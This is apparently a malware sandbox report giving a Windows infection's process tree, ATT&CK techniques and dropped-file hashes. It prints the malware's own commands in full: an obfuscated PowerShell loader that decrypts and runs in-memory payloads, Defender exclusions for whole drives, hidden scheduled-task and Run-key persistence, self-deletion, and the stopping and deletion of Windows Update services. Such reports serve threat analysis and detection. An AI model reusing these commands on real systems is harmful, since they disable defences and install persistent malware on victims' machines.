    "C:\Users\Admin\AppData\Local\Temp\9EA9.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2288);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\9EA9')
      4⤵
      PID:4324
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      PID:3568
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"
      4⤵
      PID:1308
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "
        5⤵
        
        PID:3944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        6⤵
        
        PID:2580
      - C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;
        6⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5084);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        7⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')
        7⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\5977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5977.exe"
        7⤵
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\5977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5977.exe"
        8⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\5977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5977.exe"
        8⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\5977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5977.exe"
        8⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd" "
        8⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        9⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe" function Fz($l){$l.Replace('AiBmN', '')}$vloA=Fz 'CreAiBmNateAiBmNDecAiBmNryAiBmNptAiBmNoAiBmNrAiBmN';$niFt=Fz 'LoAiBmNadAiBmN';$Ubgw=Fz 'ChaAiBmNngeAiBmNExAiBmNtenAiBmNsiAiBmNonAiBmN';$TCNm=Fz 'TraAiBmNnsfoAiBmNrmFAiBmNinAiBmNalAiBmNBlAiBmNoAiBmNckAiBmN';$KsKu=Fz 'ReAiBmNaAiBmNdAiBmNLinAiBmNesAiBmN';$gOmL=Fz 'FrAiBmNomAiBmNBaAiBmNsAiBmNeAiBmN64StAiBmNriAiBmNngAiBmN';$CdTj=Fz 'InvAiBmNokeAiBmN';$VkgB=Fz 'FirsAiBmNtAiBmN';$bUDG=Fz 'GeAiBmNtCuAiBmNrrAiBmNenAiBmNtPAiBmNrAiBmNocAiBmNesAiBmNsAiBmN';$CMHm=Fz 'EnAiBmNtrAiBmNyPAiBmNoAiBmNinAiBmNtAiBmN';function VZwrE($IxAst){$OdcJU=[System.Security.Cryptography.Aes]::Create();$OdcJU.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OdcJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OdcJU.Key=[System.Convert]::$gOmL('tRx60Ue+BsVSsmoXBDDY1e0gF+3mmpb6DEUhsmAbHFA=');$OdcJU.IV=[System.Convert]::$gOmL('0o09sv5yq4yWOVwemrt4fA==');$QGThv=$OdcJU.$vloA();$JmosV=$QGThv.$TCNm($IxAst,0,$IxAst.Length);$QGThv.Dispose();$OdcJU.Dispose();$JmosV;}function cUmcA($IxAst){$DaPTT=New-Object System.IO.MemoryStream(,$IxAst);$bUbZV=New-Object System.IO.MemoryStream;$ixPPp=New-Object System.IO.Compression.GZipStream($DaPTT,[IO.Compression.CompressionMode]::Decompress);$ixPPp.CopyTo($bUbZV);$ixPPp.Dispose();$DaPTT.Dispose();$bUbZV.Dispose();$bUbZV.ToArray();}function HBQCk($IxAst,$yhWuH){[System.Reflection.Assembly]::$niFt([byte[]]$IxAst).$CMHm.$CdTj($null,$yhWuH);}$rGDzs=[System.Linq.Enumerable]::$VkgB([System.IO.File]::$KsKu([System.IO.Path]::$Ubgw([System.Diagnostics.Process]::$bUDG().MainModule.FileName, $null)));$xqJgF = $rGDzs.Substring(3).Split('\');$seypB=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[0])));$aINzU=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[1])));HBQCk $aINzU $null;HBQCk $seypB $null;
        9⤵
        
        PID:764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(764);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        10⤵
        
        PID:228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        10⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3980);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:4020
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:2192
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:3984
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3908
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4488
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:4712
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3612
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:1268
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4788
- C:\Users\Admin\AppData\Local\Temp\C0B9.exe
  C:\Users\Admin\AppData\Local\Temp\C0B9.exe
  2⤵
  - Executes dropped EXE
  PID:3216
- - C:\Windows\system32\dllhost.exe
    "C:\Windows\system32\dllhost.exe"
    3⤵
    PID:4772
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:5116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5024
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:784
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1588
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3752
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:436
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:492
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2544
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1392
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4236
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:524
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4292
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3152
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4360
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  PID:4112
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4804
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3752
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1392
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5104
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4320
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4700
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1016
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:5036
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1320
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:880
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5080
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  PID:4872
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  PID:3508
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    PID:3876
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:4720
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
  2⤵
  PID:4484

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
- Executes dropped EXE
PID:2560
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
  2⤵
  - Creates scheduled task(s)
  PID:2120

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:3952
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4660
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1660
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4760
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4092

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
PID:4684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
2KB

MD5
e5b1cc0ae5af6a8277d75cff4af2c5e8

SHA1
4768fff3d4bbe02f89683b4a0e7b15b24b54eb9f

SHA256
d950c0d748aae641d71b11cd1c519b289917c23bee1a2b6bc5c496fd8e5d4655

SHA512
57a4737deeefac0124d73b52525993fecbbebd21a556ece87f8e79e845e07f037abb5e49f7458e8a010935c6691f18fbb913d77ecfb2ba902067788c483ec3d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
3adac03b181d7980568dda0da0efc9de

SHA1
a283c4c9bd26a65b8240d21708e57f5946778341

SHA256
24c4973ced938b77d9670ac79eb76cd52411b17ab59ec78ba14c1b433f342933

SHA512
6fbd2a32fc18606628ea56311764cd879a1196405dddd4d269ad6163b2ffdcf916786f1c0328f27ec089be5cb9b4ecb3542363f4dfb3df1c1b91a0e038b67241

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
488B

MD5
113ab396929337756736110b4b228cf7

SHA1
1b3c8b7cb3a5587e7facf2547e6887085f20ec52

SHA256
05b60383e12258d10b7284574cfa98cbb09158f9fc4bb95691b608bf56bb9b45

SHA512
234eca67b3f3330ea23783411a65069363b8cd3db88f8d5274ccf802db03cfe58494a86463d5b5385b6e80cd0e4d099f1960d5a767760bc158164c21db6fe391

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
482B

MD5
a2e020605c887f90ca933052ac811625

SHA1
5614cd038abf1e66986b7cf899241c7e06b2d750

SHA256
1936e5136baa10fd3daf6a33f4451047a3a6d709853c3ecdfdbd5e1aeb4711ef

SHA512
a390bc16a9072f6fa87637056b65027a8a7895de142f92578c9c515e61149dca80be9b81581c477cfcfefe57ad4fb92259c3eae483738388e3d6af63da915a82

Download Submit
C:\Users\Admin\AppData\Local\953cce22-b8d2-4296-ba73-5ae3b41b6469\EC2A.exe

Filesize
782KB

MD5
5a31b39bc1aeb9e9cf101369c6443246

SHA1
89d1c38255c07a276620d57a674d81ac052e27e1

SHA256
95a3871c134ffd2b87034387d61485ec6e292de119cdfa162f88c41d763d0407

SHA512
6db4157cd7eb0002ce072f93615cb115e75ce284c8caa84a5fcf45832ede91f205cbdd8cf690f0c6e84da3458b476c20f878d5f6fdba18282b32b0d571286222

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1cfe572f8a58e5c315192b2262b19389

SHA1
0ee01be5ceb2f4c1769d1461a33900abb85879ea

SHA256
a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

SHA512
7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

Download Submit
